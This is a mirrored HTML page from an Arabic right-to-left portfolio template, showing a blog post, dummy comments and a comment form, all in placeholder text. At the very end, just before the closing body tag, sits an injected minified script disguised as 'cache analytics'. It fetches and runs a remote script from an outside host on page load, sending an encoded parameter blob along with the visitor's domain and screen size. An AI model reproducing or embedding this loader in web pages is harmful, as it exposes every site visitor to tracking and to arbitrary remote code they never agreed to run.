<!DOCTYPE html>
<html lang="ar" dir="rtl" style="direction: rtl;">
    
<!-- Mirrored from baha.malyarchuk.space/rtl/single-rtl-blog.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 15 Jun 2020 08:44:05 GMT -->
<head>

		<!-- Meta -->
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">

		<!-- Title -->
		<title>Baha - Personal Portfolio Template</title>

		<!-- CSS Plugins -->
        <link rel="stylesheet" href="../css/plugins/bootstrap.min.css">
        <link rel="stylesheet" href="../css/plugins/font-awesome.css">
		<link rel="stylesheet" href="../css/plugins/magnific-popup.css">
		<link rel="stylesheet" href="../css/plugins/simplebar.css">
		<link rel="stylesheet" href="../css/plugins/owl.carousel.min.css">
		<link rel="stylesheet" href="../css/plugins/owl.theme.default.min.css">
		<link rel="stylesheet" href="../css/plugins/jquery.animatedheadline.css">

		<!-- CSS Base -->
        <link rel="stylesheet" class="theme-st" href="../css/style-dark.css">

		<!-- Settings Style -->
		<link rel="stylesheet" class="pos-nav" href="../css/settings/right-nav.css" />
		<link rel="stylesheet" class="box-bd" href="../css/settings/box/box.css">
		<link rel="stylesheet" class="box-st" href="../css/settings/box/circle.css" />
		<link rel="stylesheet" class="box-tl" href="../css/settings/title/title.css">
		<link rel="stylesheet" class="style-cl" href="../css/settings/color/green-color.css" />
		
		<!-- CSS Style RTL -->
		<link rel="stylesheet" href="../css/settings/rtl.css">

		<link rel="stylesheet" href="../setting/style-demo.css">

    </head>
    <body>

		<!--Theme Options Start-->
		<div class="style-options">
			<div class="toggle-btn">
				<span><svg xmlns="http://www.w3.org/2000/svg" width="28px" height="28px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"></rect><path d="M18.6225,9.75 L18.75,9.75 C19.9926407,9.75 21,10.7573593 21,12 C21,13.2426407 19.9926407,14.25 18.75,14.25 L18.6854912,14.249994 C18.4911876,14.250769 18.3158978,14.366855 18.2393549,14.5454486 C18.1556809,14.7351461 18.1942911,14.948087 18.3278301,15.0846699 L18.372535,15.129375 C18.7950334,15.5514036 19.03243,16.1240792 19.03243,16.72125 C19.03243,17.3184208 18.7950334,17.8910964 18.373125,18.312535 C17.9510964,18.7350334 17.3784208,18.97243 16.78125,18.97243 C16.1840792,18.97243 15.6114036,18.7350334 15.1896699,18.3128301 L15.1505513,18.2736469 C15.008087,18.1342911 14.7951461,18.0956809 14.6054486,18.1793549 C14.426855,18.2558978 14.310769,18.4311876 14.31,18.6225 L14.31,18.75 C14.31,19.9926407 13.3026407,21 12.06,21 C10.8173593,21 9.81,19.9926407 9.81,18.75 C9.80552409,18.4999185 9.67898539,18.3229986 9.44717599,18.2361469 C9.26485393,18.1556809 9.05191298,18.1942911 8.91533009,18.3278301 L8.870625,18.372535 C8.44859642,18.7950334 7.87592081,19.03243 7.27875,19.03243 C6.68157919,19.03243 6.10890358,18.7950334 5.68746499,18.373125 C5.26496665,17.9510964 5.02757002,17.3784208 5.02757002,16.78125 C5.02757002,16.1840792 5.26496665,15.6114036 5.68716991,15.1896699 L5.72635306,15.1505513 C5.86570889,15.008087 5.90431906,14.7951461 5.82064513,14.6054486 C5.74410223,14.426855 5.56881236,14.310769 5.3775,14.31 L5.25,14.31 C4.00735931,14.31 3,13.3026407 3,12.06 C3,10.8173593 4.00735931,9.81 5.25,9.81 C5.50008154,9.80552409 5.67700139,9.67898539 5.76385306,9.44717599 C5.84431906,9.26485393 5.80570889,9.05191298 5.67216991,8.91533009 L5.62746499,8.870625 C5.20496665,8.44859642 4.96757002,7.87592081 4.96757002,7.27875 C4.96757002,6.68157919 5.20496665,6.10890358 5.626875,5.68746499 C6.04890358,5.26496665 6.62157919,5.02757002 7.21875,5.02757002 C7.81592081,5.02757002 8.38859642,5.26496665 8.81033009,5.68716991 L8.84944872,5.72635306 C8.99191298,5.86570889 9.20485393,5.90431906 9.38717599,5.82385306 L9.49484664,5.80114977 C9.65041313,5.71688974 9.7492905,5.55401473 9.75,5.3775 L9.75,5.25 C9.75,4.00735931 10.7573593,3 12,3 C13.2426407,3 14.25,4.00735931 14.25,5.25 L14.249994,5.31450877 C14.250769,5.50881236 14.366855,5.68410223 14.552824,5.76385306 C14.7351461,5.84431906 14.948087,5.80570889 15.0846699,5.67216991 L15.129375,5.62746499 C15.5514036,5.20496665 16.1240792,4.96757002 16.72125,4.96757002 C17.3184208,4.96757002 17.8910964,5.20496665 18.312535,5.626875 C18.7350334,6.04890358 18.97243,6.62157919 18.97243,7.21875 C18.97243,7.81592081 18.7350334,8.38859642 18.3128301,8.81033009 L18.2736469,8.84944872 C18.1342911,8.99191298 18.0956809,9.20485393 18.1761469,9.38717599 L18.1988502,9.49484664 C18.2831103,9.65041313 18.4459853,9.7492905 18.6225,9.75 Z" fill="#000000" fill-rule="nonzero" opacity="0.3"></path><path d="M12,15 C13.6568542,15 15,13.6568542 15,12 C15,10.3431458 13.6568542,9 12,9 C10.3431458,9 9,10.3431458 9,12 C9,13.6568542 10.3431458,15 12,15 Z" fill="#000000"></path></g></svg>					</span>
			</div>
			<div class="style-menu" data-simplebar>
				<div class="theme-style">
					<h4 class="mt-30 mb-10">Theme Style</h4>
					<ul>
						<li><a href="../css/style-dark.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><path d="M12.0700837,4.0003006 C11.3895108,5.17692613 11,6.54297551 11,8 C11,12.3948932 14.5439081,15.9620623 18.9299163,15.9996994 C17.5467214,18.3910707 14.9612535,20 12,20 C7.581722,20 4,16.418278 4,12 C4,7.581722 7.581722,4 12,4 C12.0233848,4 12.0467462,4.00010034 12.0700837,4.0003006 Z" fill="#000000"/></g></svg> Dark</a>
						</li>
						<li><a href="../css/style-light.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><circle fill="#000000" opacity="0.3" cx="12" cy="9" r="8"/><path d="M14.5297296,11 L9.46184488,11 L11.9758349,17.4645458 L14.5297296,11 Z M10.5679953,19.3624463 L6.53815512,9 L17.4702704,9 L13.3744964,19.3674279 L11.9759405,18.814912 L10.5679953,19.3624463 Z" fill="#000000" fill-rule="nonzero" opacity="0.3"/><path d="M10,22 L14,22 L14,22 C14,23.1045695 13.1045695,24 12,24 L12,24 C10.8954305,24 10,23.1045695 10,22 Z" fill="#000000" opacity="0.3"/><path d="M9,20 C8.44771525,20 8,19.5522847 8,19 C8,18.4477153 8.44771525,18 9,18 C8.44771525,18 8,17.5522847 8,17 C8,16.4477153 8.44771525,16 9,16 L15,16 C15.5522847,16 16,16.4477153 16,17 C16,17.5522847 15.5522847,18 15,18 C15.5522847,18 16,18.4477153 16,19 C16,19.5522847 15.5522847,20 15,20 C15.5522847,20 16,20.4477153 16,21 C16,21.5522847 15.5522847,22 15,22 L9,22 C8.44771525,22 8,21.5522847 8,21 C8,20.4477153 8.44771525,20 9,20 Z" fill="#000000"/></g></svg> Light </a>
						</li>
					</ul>
				</div>
				<div class="theme-rtl">
					<h4 class="mt-30 mb-10">LTR/RTL Style</h4>
					<ul>
						<li><a href="#"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><rect fill="#000000" opacity="0.3" x="4" y="5" width="16" height="2" rx="1"/><rect fill="#000000" opacity="0.3" x="4" y="13" width="16" height="2" rx="1"/><path d="M5,9 L13,9 C13.5522847,9 14,9.44771525 14,10 C14,10.5522847 13.5522847,11 13,11 L5,11 C4.44771525,11 4,10.5522847 4,10 C4,9.44771525 4.44771525,9 5,9 Z M5,17 L13,17 C13.5522847,17 14,17.4477153 14,18 C14,18.5522847 13.5522847,19 13,19 L5,19 C4.44771525,19 4,18.5522847 4,18 C4,17.4477153 4.44771525,17 5,17 Z" fill="#000000"/></g></svg> LTR </a>
						</li>
						<li><a href="single-rtl-blog.html"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><path d="M5,5 L19,5 C19.5522847,5 20,5.44771525 20,6 C20,6.55228475 19.5522847,7 19,7 L5,7 C4.44771525,7 4,6.55228475 4,6 C4,5.44771525 4.44771525,5 5,5 Z M5,13 L19,13 C19.5522847,13 20,13.4477153 20,14 C20,14.5522847 19.5522847,15 19,15 L5,15 C4.44771525,15 4,14.5522847 4,14 C4,13.4477153 4.44771525,13 5,13 Z" fill="#000000" opacity="0.3"/><path d="M11,9 L19,9 C19.5522847,9 20,9.44771525 20,10 C20,10.5522847 19.5522847,11 19,11 L11,11 C10.4477153,11 10,10.5522847 10,10 C10,9.44771525 10.4477153,9 11,9 Z M11,17 L19,17 C19.5522847,17 20,17.4477153 20,18 C20,18.5522847 19.5522847,19 19,19 L11,19 C10.4477153,19 10,18.5522847 10,18 C10,17.4477153 10.4477153,17 11,17 Z" fill="#000000"/></g></svg> RTL </a>
						</li>
					</ul>
				</div>
				<div class="style-nav">
                    <h4 class="mt-30 mb-10">Menu Position</h4>
                    <ul>
						<li><a href="../css/settings/top-nav.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><rect fill="#000000" x="2" y="5" width="19" height="4" rx="1"/><rect fill="#000000" opacity="0.3" x="2" y="11" width="19" height="10" rx="1"/></g></svg> Top</a></li>
                        <li><a href="../css/settings/left-nav.css">
<svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24" ><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><rect fill="#000000" x="9" y="5" width="13" height="14" rx="1.5"/><rect fill="#000000" opacity="0.3" x="2" y="5" width="5" height="14" rx="1"/></g></svg> Left</a></li>
                        <li><a href="../css/settings/right-nav.css">
<svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><rect fill="#000000" x="2" y="5" width="13" height="14" rx="1.5"/><rect fill="#000000" opacity="0.3" x="17" y="5" width="5" height="14" rx="1"/></g></svg> Right</a></li>
                        <li><a href="../css/settings/bottom-nav.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24" style="transform: rotateZ(180deg);
"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><rect fill="#000000" x="2" y="5" width="19" height="4" rx="1"/><rect fill="#000000" opacity="0.3" x="2" y="11" width="19" height="10" rx="1"/></g></svg> Bottom</a></li>
                    </ul>
                </div>
				<div class="box-body">
					<h4 class="mt-30 mb-10">Box Style</h4>
					<ul>
						<li><a href="../css/settings/box/box.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><path d="M4,7 L20,7 L20,19.5 C20,20.3284271 19.3284271,21 18.5,21 L5.5,21 C4.67157288,21 4,20.3284271 4,19.5 L4,7 Z M10,10 C9.44771525,10 9,10.4477153 9,11 C9,11.5522847 9.44771525,12 10,12 L14,12 C14.5522847,12 15,11.5522847 15,11 C15,10.4477153 14.5522847,10 14,10 L10,10 Z" fill="#000000"/><rect fill="#000000" opacity="0.3" x="2" y="3" width="20" height="4" rx="1"/></g></svg> Box </a>
						</li>
						<li><a href="../css/settings/box/no-box.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><path d="M4,9.67471899 L10.880262,13.6470401 C10.9543486,13.689814 11.0320333,13.7207107 11.1111111,13.740321 L11.1111111,21.4444444 L4.49070127,17.526473 C4.18655139,17.3464765 4,17.0193034 4,16.6658832 L4,9.67471899 Z M20,9.56911707 L20,16.6658832 C20,17.0193034 19.8134486,17.3464765 19.5092987,17.526473 L12.8888889,21.4444444 L12.8888889,13.6728275 C12.9050191,13.6647696 12.9210067,13.6561758 12.9368301,13.6470401 L20,9.56911707 Z" fill="#000000"/><path d="M4.21611835,7.74669402 C4.30015839,7.64056877 4.40623188,7.55087574 4.5299008,7.48500698 L11.5299008,3.75665466 C11.8237589,3.60013944 12.1762411,3.60013944 12.4700992,3.75665466 L19.4700992,7.48500698 C19.5654307,7.53578262 19.6503066,7.60071528 19.7226939,7.67641889 L12.0479413,12.1074394 C11.9974761,12.1365754 11.9509488,12.1699127 11.9085461,12.2067543 C11.8661433,12.1699127 11.819616,12.1365754 11.7691509,12.1074394 L4.21611835,7.74669402 Z" fill="#000000" opacity="0.3"/></g></svg> No Box</a>
						</li>
					</ul>
				</div>
				<div class="box-style">
					<ul>
						<li><a href="../css/settings/box/circle.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><path d="M12,21 C7.02943725,21 3,16.9705627 3,12 C3,7.02943725 7.02943725,3 12,3 C16.9705627,3 21,7.02943725 21,12 C21,16.9705627 16.9705627,21 12,21 Z M12,16 C14.209139,16 16,14.209139 16,12 C16,9.790861 14.209139,8 12,8 C9.790861,8 8,9.790861 8,12 C8,14.209139 9.790861,16 12,16 Z" fill="#000000"/><circle fill="#000000" opacity="0.3" cx="12" cy="12" r="1"/></g></svg> Circle</a>
						</li>
						<li><a href="../css/settings/box/hexagon.css"><svg xmlns="http://www.w3.org/2000/svg" width="22px" height="22px" viewBox="0 0 24 24"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><rect x="0" y="0" width="24" height="24"/><path d="M12.7442084,3.27882877 L19.2473374,6.9949025 C19.7146999,7.26196679 20.003129,7.75898194 20.003129,8.29726722 L20.003129,15.7027328 C20.003129,16.2410181 19.7146999,16.7380332 19.2473374,17.0050975 L12.7442084,20.7211712 C12.2830594,20.9846849 11.7169406,20.9846849 11.2557916,20.7211712 L4.75266256,17.0050975 C4.28530007,16.7380332 3.99687097,16.2410181 3.99687097,15.7027328 L3.99687097,8.29726722 C3.99687097,7.75898194 4.28530007,7.26196679 4.75266256,6.9949025 L11.2557916,3.27882877 C11.7169406,3.01531506 12.2830594,3.01531506 12.7442084,3.27882877 Z M12,14.5 C13.3807119,14.5 14.5,13.3807119 14.5,12 C14.5,10.6192881 13.3807119,9.5 12,9.5 C10.6192881,9.5 9.5,10.6192881 9.5,12 C9.5,13.3807119 10.6192881,14.5 12,14.5 Z" fill="#000000"/></g></svg> Hexagon</a>
						</li>
					</ul>
				</div>
				<div class="style-color mb-70">
					<h4 class="mt-30 mb-10">Theme Color</h4>
					<ul>
						<li><a href="../css/settings/color/green-color.css" style="background-color: #25ca7f;"></a></li>
						<li><a href="../css/settings/color/blue-color.css" style="background-color: #00a3e1;"></a></li>
						<li><a href="../css/settings/color/red-color.css" style="background-color: #d94c48;"></a></li>
						<li><a href="../css/settings/color/purple-color.css" style="background-color: #bb68c8;"></a></li>
						<li><a href="../css/settings/color/sea-color.css" style="background-color: #0dcdbd;"></a></li>
						<li><a href="../css/settings/color/yellow-color.css" style="background-color: #eae328;"></a></li>
					</ul>
				</div>
			</div>
		</div>

		<!-- Preloader -->
		<div id="preloader">
  			<div class="loading-area">
    			<div class="circle"></div>
  			</div>
  			<div class="left-side"></div>
  			<div class="right-side"></div>
		</div>

		<div class="header-mobile">
        	<a class="header-toggle"><i class="fas fa-bars"></i></a>
        	<h2>الباحة</h2>
        </div>

		<!-- Left Block -->
		<nav class="header-main" data-simplebar>

			<!-- Logo -->
			<div class="logo">
            	<img src="../img/logo.png" alt="">
            </div>

          	<ul>
				<li data-tooltip="منزل" data-position="top">
            		<a href="../index.html" class="fas fa-house-damage"></a>
				</li>
				<li>
            		<span class="active fas fa-receipt"></span>
				</li>
				<li data-tooltip="عودة إلى المدونة" data-position="top">
            		<a href="../blog-list.html" class="fas fa-long-arrow-alt-left"></a>
				</li>
          	</ul>

			<!-- Sound wave -->
    		<a class="music-bg">
      			<div class="lines">
        			<span></span>
        			<span></span>
        			<span></span>
        			<span></span>
					<span></span>
					<span></span>
      			</div>
				<p> صوت </p>
    		</a>
		 </nav>

		<!--Blog Page-->
		<div class="blog-page" data-simplebar>
			<nav class="blog-nav">
            	<a href="#" data-tooltip="السابق" data-position="right">
					<i class="fas fa-long-arrow-alt-right"></i>
				</a>
            	<a href="../index.html#blog">
					<i class="fas fa-bars"></i>
				</a>
            	<a href="#" data-tooltip="تالي" data-position="left">
					<i class="fas fa-long-arrow-alt-left"></i>
				</a>
            </nav>
			<div class="blog-image">
				<img src="../img/blog/blog-page-img.jpg" alt="">
			</div>
			<div class="row blog-container">
				<div class="col-md-10 offset-md-1">

					<!-- Heading -->
					<div class="blog-heading pt-70 pb-100">
						<h2>الطريق للنجاح</h2>
						<span><i class="fas fa-home"></i><a href="#">وسم</a></span>
						<span><i class="fas fa-comment"></i><a href="#">5 تعليقات</a></span>
						<span><i class="fas fa-calendar-alt"></i>06 يناير 2019</span>
					</div>

					<!-- Content -->
					<div class="blog-content">
						<p>خلافا للاعتقاد الشائع ، النص الكلاسيكي ليس مجرد نص عشوائي. لها جذور في قطعة من الأدب اللاتيني الكلاسيكي من 45 قبل الميلاد ، مما يجعلها أكثر من 2000 سنة. بحث ريتشارد مكلينتوك ، وهو أستاذ لاتيني في كلية هامبدن سيدني في فرجينيا ، عن واحدة من أكثر الكلمات اللاتينية غموضًا ، كونسيتيتور ، من ممر لوريم إبسوم ، ومضىًّا باستشهاد الكلمة في الأدب الكلاسيكي ، اكتشف المصدر الذي لا شك فيه. يأتي النص الكلاسيكي من القسمين 1.10.32 و 1.10.33 من "حول حدود الخير والشر" (قصور الخير والشر) للكاتب شيشرون ، الذي كتب في عام 45 قبل الميلاد.</p>
						<p>هذا الكتاب هو أطروحة عن نظرية الأخلاق ، وشعبية للغاية خلال عصر النهضة. السطر الأول من النص الكلاسيكي ، يأتي من سطر في القسم 1.10.32.</p>
						<blockquote>أبجد هوز هو مجرد دمية النص من لوريم كان النص دمية في هذه الصناعة القياسية من أي وقت مضى.
							<span><img src="../img/user-photo.jpg" alt=""> مارك جونسون</span>
						</blockquote>
						<p>لأنه ألم ، ولكن لأن هناك ظروف تحدث فيها يكدح الألم والألم في بعض الأحيان. لنأخذ مثالاً تافهاً ، أي منا يمارس تمرين بدني شاق على الإطلاق ، باستثناء الحصول على بعض المزايا منه؟ ولكن من لديه الحق في العثور على خطأ مع رجل يختار أن يستمتع بمتعة ليس لها عواقب مزعجة ، أو من يتجنب الألم الذي لا ينتج عنه أي متعة؟ "أو كلمات عشوائية لا تبدو حتى معقولة بعض الشيء. إذا كنت ذاهبون لاستخدام ممر لوريم إبسوم ، أنت بحاجة إلى التأكد</p>
					</div>

					<!-- Comments -->
					<div class="blog-comments mt-100 mb-100">
						<div class="header-box mb-50">
							<h3>تعليقات</h3>
						</div>
						<ul>
							<li>
								<div class="author-img">
									<img src="../img/blog/authors/author-1.png" alt="">
								</div>
								<div class="comment-text">
									<a href="#"><i class="fas fa-reply"></i>رد</a>
									<h4>اليكس دو</h4>
									<span>15 أغسطس 2018 الساعة 8:11 صباحًا</span>
									<p>لا كرة القدم كما الحلق، وإنما هو البيئي. تنورة لكرة القدم السهام شرائح.</p>
								</div>
								<ul>
									<li>
										<div class="author-img">
											<img src="../img/blog/authors/author-2.png" alt="">
										</div>
										<div class="comment-text">
											<h4>كريس دوك</h4>
											<span>15 أغسطس 2018 الساعة 8:11 صباحًا</span>
											<p>لا كرة القدم كما الحلق، وإنما هو البيئي. تنورة لكرة القدم السهام شرائح.</p>
										</div>
									</li>
								</ul>
							</li>

							<li>
								<div class="author-img">
									<img src="../img/blog/authors/author-3.png" alt="">
								</div>
								<div class="comment-text">
									<a href="#"><i class="fas fa-reply"></i>رد</a>
									<h4>إيما الفلاني</h4>
									<span>15 أغسطس 2018 الساعة 8:11 صباحًا</span>
									<p>لا كرة القدم كما الحلق، وإنما هو البيئي. تنورة لكرة القدم السهام شرائح.</p>
								</div>
							</li>
						</ul>
					</div>

					<!--Blog Form-->
					<div class="header-box mb-50">
						<h3>ترك تعليق</h3>
					</div>

					<div class="contact-form mb-100">
                        <form method="post" class="box contact-valid" id="contact-form">
							<div class="row">
                            	<div class="col-lg-6 col-sm-12">
                               		<input type="text" name="name" id="name" class="form-control" placeholder="اسم *">
                            	</div>
                            	<div class="col-lg-6 col-sm-12">
                               		<input type="email" name="email" id="email" class="form-control" placeholder="بريد *">
                            	</div>
                            	<div class="col-lg-12 col-sm-12">
                                	<textarea class="form-control" name="note"  id="note" placeholder="رسالتك"></textarea>
                            	</div>
                             	<div class="col-lg-12 col-sm-12 text-center">
                               		<button type="submit" class="btn-st">أرسل رسالة</button>
                               		<div id="loader">
                              			<i class="fas fa-sync"></i>
                               		</div>
                            	</div>
								<div class="col-lg-12 col-sm-12">
                            		<div class="error-messages">
                                		<div id="success">
											<i class="far fa-check-circle"></i>شكرا لك! لقد تم ارسال رسالتك.
										</div>
                                		<div id="error">
											<i class="far fa-times-circle"></i>حدث خطأ أثناء إرسال البريد الإلكتروني. الرجاء معاودة المحاولة في وقت لاحق.
										</div>
									</div>
                            	</div>
							</div>
                    	</form>
                   	</div>
				</div>
			</div>
		</div>

		<!-- All Script -->
		<script src="../js/jquery.min.js"></script>
		<script src="../js/isotope.pkgd.min.js"></script>
		<script src="../js/bootstrap.min.js"></script>
		<script src="../js/simplebar.js"></script>
		<script src="../js/owl.carousel.min.js"></script>
		<script src="../js/jquery.magnific-popup.min.js"></script>
		<script src="../js/jquery.animatedheadline.min.js"></script>
		<script src="../js/jquery.easypiechart.js"></script>
		<script src="../js/jquery.validation.js"></script>
		<script src="../js/tilt.js"></script>
        <script src="../js/main.js"></script>
        <script src="https://maps.google.com/maps/api/js?sensor=false"></script>

		<script src="../setting/main-demo.js"></script>

    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXErcD%2bwYCuWdRJBEEYvhZB58J0KRY6ucWgIRhGG8wOeeTAl1hCfsAO%2fpkDRl2LnC6UIC31RU3%2bIwyZSv2mdoa3g2ItTK99lSHPqU%2bufF6sLJ%2blIQ7LXZxhdtGD1F00FJ8DYFh0aK5DqiK4dh2zd71gwQ5xuebya7VCMtEsL%2f48Zptrq3iMKOU%2bVgNKJPZsyNnmX43cOLK%2b%2fbNSmQK%2bvxtfxYK6ReMRMnwWpI1KqoF4IzrS8JjapMY%2fpTL4q4ji846mKNmXrifDsVNJSCH2GdvqFvyjgbhyVsZ5nUN6tiJ6AH1R5Ox6K6%2bTwHsQjTq7gfXq5sxfWxg5lWX5BzLj2fx4GU4PELCnQldI0WysEue8BJeDQqw41Drpbk%2f0%2f5oq2uatOLeOd0Ysn3R5lQLQGAr5eBvni5MSZgzZSjvIaXx2mOJikoMI60E0zrk6zBMTXOluMHYDZ3uExyGY%2b2%2fCHwWLiLFQYy0Krb4dEl4uPJ6%2bVZBD%2bjGDRq%2f5g%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from baha.malyarchuk.space/rtl/single-rtl-blog.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 15 Jun 2020 08:44:05 GMT -->
</html>